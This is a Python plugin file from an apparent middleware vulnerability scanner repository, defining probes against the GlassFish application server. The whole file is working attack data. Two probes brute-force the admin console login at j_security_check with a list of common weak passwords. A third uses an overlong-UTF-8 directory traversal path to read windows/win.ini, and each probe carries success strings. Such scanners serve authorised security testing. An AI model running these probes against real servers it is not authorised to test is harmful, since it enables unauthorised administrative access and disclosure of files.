nihaohello/N-MiddlewareScan
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
N-MiddlewareScan/plugins/glassfish_plugin.py
nihaohello 905931df7c new plugin
2019-03-28 23:56:13 +08:00

41 lines
2.3 KiB
Python
Raw Permalink Blame History

#coding=utf-8
pocs=[
{"requests_option":"POST",
"url":["/common/j_security_check"],
"params":[],
"data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"],
"flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console</title>', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', '<title>Common Tasks</title>', 'title=\"Logout from GlassFish'],
"success":"exist /common/j_security_check weak password",
"fail":"NOT exist /common/j_security_check weak password",
"end":"",
"admin_bursk":"True",
"username":['admin'],
"password":['admin', 'glassfish', 'password', '123456', '12345678', '123456789', 'admin123', 'admin888','admin1', 'administrator', '8888888', '123123', 'manager', 'root'],
},
{"requests_option":"POST",
"url":["/j_security_check?loginButton=Login"],
"params":[],
"data":["j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true"],
"flag":['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks','/resource/common/js/adminjsf.js\">', 'Admin Console</title>', 'src=\"/homePage.jsf\"','src=\"/header.jsf\"', 'src=\"/index.jsf\"', '<title>Common Tasks</title>','title=\"Logout from GlassFish'],
"success":"exist /j_security_check?loginButton=Login weak password",
"fail":"NOT exist /j_security_check?loginButton=Login weak password",
"end":"/j_security_check?loginButton=Login 测试结束",
"admin_bursk":"True",
"username":['admin'],
"password":['admin', 'glassfish', 'password', 'adminadmin', '123456', '12345678', '123456789', 'admin123','admin888', 'admin1', 'administrator', '8888888', '123123', 'manager', 'root'],
},
{"requests_option":"GET",
"url":["/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],
"params":[],
"data":[],
"flag":["[fonts]", "root"],
"success":"exist Directory_traversal vuln",
"fail":"NOT exist Directory_traversal vuln",
"end":"exist Directory_traversal vuln 测试结束",
"admin_bursk":"",
"username":[],
"password":[],
},
]
Reference in New Issue View Git Blame Copy Permalink